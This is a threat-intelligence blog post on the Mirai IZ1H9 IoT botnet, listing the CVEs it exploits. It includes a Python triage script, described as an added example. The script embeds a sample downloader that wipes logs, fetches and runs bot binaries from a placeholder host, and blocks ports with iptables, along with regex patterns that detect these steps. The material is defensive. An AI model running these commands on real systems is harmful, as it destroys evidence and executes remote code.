The PolySwarm Blog

Analyze suspicious files and URLs, at scale, millions of times per day. Get real-time threat intel from a crowdsourced network of security experts and antivirus companies competing to protect you.

Mirai IZ1H9

Oct 16, 2023 2:17:16 PM / by The Hivemind


Executive Summary

Mirai IZ1H9, a newer variant of Mirai, is being used to infect Linux devices for use in a DDoS campaign.

Key Takeaways

  • Mirai IZ1H9, a newer variant of Mirai, is being used to infect Linux devices for use in a DDoS campaign.
  • Mirai IZ1H9 is known to leverage at least thirteen different exploit payloads, built from recently released exploit code for a number of CVEs.
  • The CVEs used in this campaign are noted in this report.

What is Mirai IZ1H9?

FortiGuard Labs recently reported on Mirai IZ1H9, which is being used to infect devices for use in a DDoS campaign. It affects Linux devices, particularly IoT devices.

Mirai IZ1H9 is known to leverage at least thirteen different exploit payloads, built from recently released exploit code for a number of CVEs. Some of the CVEs were disclosed as recently as 2023.

IZ1H9 has been observed targeting a variety of Linux-based devices, including D-Link devices, Netis routers, Sunhillo SureLine, Geutebruck IP cameras, Yealink Device Management, Zyxel devices, TP-Link Archer routers, Korenix JetWave access points, and TOTOLINK routers.

The CVEs exploited by IZ1H9 include the following:

CVE-2015-1187, CVE-2016-20017, CVE-2020-25506, and CVE-2021-45382 are critical severity vulnerabilities in D-Link devices that allow a threat actor to achieve command injection via a crafted request.

CVE-2019-19356 is an RCE vulnerability in the Netis WF2419 router that is reachable through its tracert function and exists because user input is not sanitized.

CVE-2021-36380, CVE-2021-33544/33548/33549/33550/33551/33552/33553/33554, and CVE-2021-27561/27562 affect Sunhillo SureLine, Geutebruck IP cameras, and Yealink Device Management, respectively, and allow arbitrary command execution.

CVE-2023-1389 is a command injection vulnerability affecting TP-Link Archer AX21 (AX1800).

CVE-2023-23295 is a command injection vulnerability affecting Korenix JetWave wireless AP.

CVE-2022-40475/25080/25079/25081/25082/25078/25084/25077/25076/38511/25075/25083 are vulnerabilities affecting TOTOLINK routers.

Other Vulnerabilities

IZ1H9 also leverages an exploit targeting a vulnerability in the /bin/zhttpd/ component of Zyxel devices. Because the component does not sufficiently validate input, a threat actor can exploit it to achieve RCE.

FortiGuard Labs also noted an additional exploit payload that targets devices it could not identify. It appears to be very similar to an exploit for a vulnerability affecting Prolink PRC2402M routers.

Once an exploit payload succeeds, the compromised device retrieves a shell script downloader from the C2 server. When executed, the script deletes logs in an attempt to cover its tracks, then downloads and executes multiple bot clients, each built for a different Linux architecture.

As its last step, the shell script downloader blocks network connections on multiple ports by altering the device's iptables rules. The infected device is then leveraged as one of many nodes in the botnet.
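The behaviours described above (log wiping, fetching a bot binary for each CPU architecture, then blocking ports with iptables) are static indicators an analyst can hunt for in any downloader script recovered from a compromised device. The following Python triage script is an added example and is not code from PolySwarm or FortiGuard Labs; the embedded sample script is constructed for illustration, and its host (a TEST-NET-2 address), paths and file names are hypothetical, not real IZ1H9 indicators.

```python
"""Static triage of a Mirai-style shell script downloader.

Added example for this post; it is not code from PolySwarm, FortiGuard Labs
or the IZ1H9 operators. The sample script, its host (a TEST-NET-2 address),
paths and file names are constructed for illustration and are not IZ1H9
indicators.
"""
import re

# Constructed sample mimicking the three behaviours the post describes:
# log wiping, per-architecture bot fetching, and iptables port blocking.
SAMPLE_SCRIPT = r"""#!/bin/sh
cd /tmp || cd /var/run || cd /mnt || cd /
rm -rf /var/log/* ; rm -f ~/.bash_history ; history -c
for a in arm arm5 arm6 arm7 mips mipsel x86 x86_64 sh4 ppc; do
  wget http://198.51.100.7/bins/bot.$a -O bot.$a || curl -s http://198.51.100.7/bins/bot.$a -o bot.$a
  chmod 777 bot.$a
  ./bot.$a
done
iptables -A INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 80 -j DROP
iptables -A INPUT -p tcp --dport 8080 -j DROP
rm -f bot.*
"""

# rm of log directories / shell history, or an explicit history wipe
LOG_WIPE_RE = re.compile(r"rm\s+-\w+\s+\S*(?:/var/log|bash_history)|history\s+-c")
# one fetch command up to the next separator; the host is pulled from its URL
FETCH_CMD_RE = re.compile(r"\b(?:wget|curl|tftp)\b[^\n;|&]*")
URL_HOST_RE = re.compile(r"(?:https?|tftp)://([\w.:-]+)")
# architecture names Mirai-family droppers iterate over when fetching bots
ARCH_RE = re.compile(
    r"\b(?:arm\d?|aarch64|mips|mipsel|mpsl|x86_64|x86|i[3-6]86|sh4|ppc|m68k|sparc|arc)\b"
)
# inbound iptables rule that drops/rejects a port (locks out admins and rivals)
IPTABLES_RE = re.compile(
    r"iptables\s+-[AI]\s+INPUT\b[^\n]*?--dport\s+(\d+)[^\n]*?-j\s+(DROP|REJECT)"
)


def triage(script: str) -> dict:
    """Return the indicators found in a shell script plus a verdict string."""
    log_wipe_hits = len(LOG_WIPE_RE.findall(script))
    hosts = set()
    for cmd in FETCH_CMD_RE.findall(script):
        m = URL_HOST_RE.search(cmd)
        if m:
            hosts.add(m.group(1))
    architectures = sorted(set(ARCH_RE.findall(script)))
    blocked_ports = sorted(int(port) for port, _ in IPTABLES_RE.findall(script))

    indicators = 0
    if log_wipe_hits:
        indicators += 1
    # fetching the same file name for several CPU families is the signature of
    # a multi-architecture bot dropper, not of a normal installer
    if hosts and len(architectures) >= 3:
        indicators += 1
    if blocked_ports:
        indicators += 1

    if indicators == 0:
        verdict = "no botnet indicators"
    elif indicators >= 2:
        verdict = "likely Mirai-style downloader"
    else:
        verdict = "suspicious"

    return {
        "log_wipe_hits": log_wipe_hits,
        "download_hosts": sorted(hosts),
        "architectures": architectures,
        "blocked_ports": blocked_ports,
        "verdict": verdict,
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_SCRIPT).items():
        print(f"{key}: {value}")
```

Run it as-is to triage the embedded sample, or pass the contents of a recovered downloader to triage(). The verdict requires at least two of the three indicators, so a lone iptables DROP rule in a legitimate hardening script is reported as suspicious rather than as a bot dropper, while the hosts and ports it extracts are the first things to pivot on when hunting for other infected devices.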


PolySwarm has multiple samples of IZ1H9.

You can use the following CLI command to search for all xx samples in our portal:

$ polyswarm link list -f IZ1H9


Don’t have a PolySwarm account? Go here to sign up for a free Community plan or to subscribe.



Topics: Threat Bulletin, Linux, IoT, Mirai, Botnet, IZ1H9
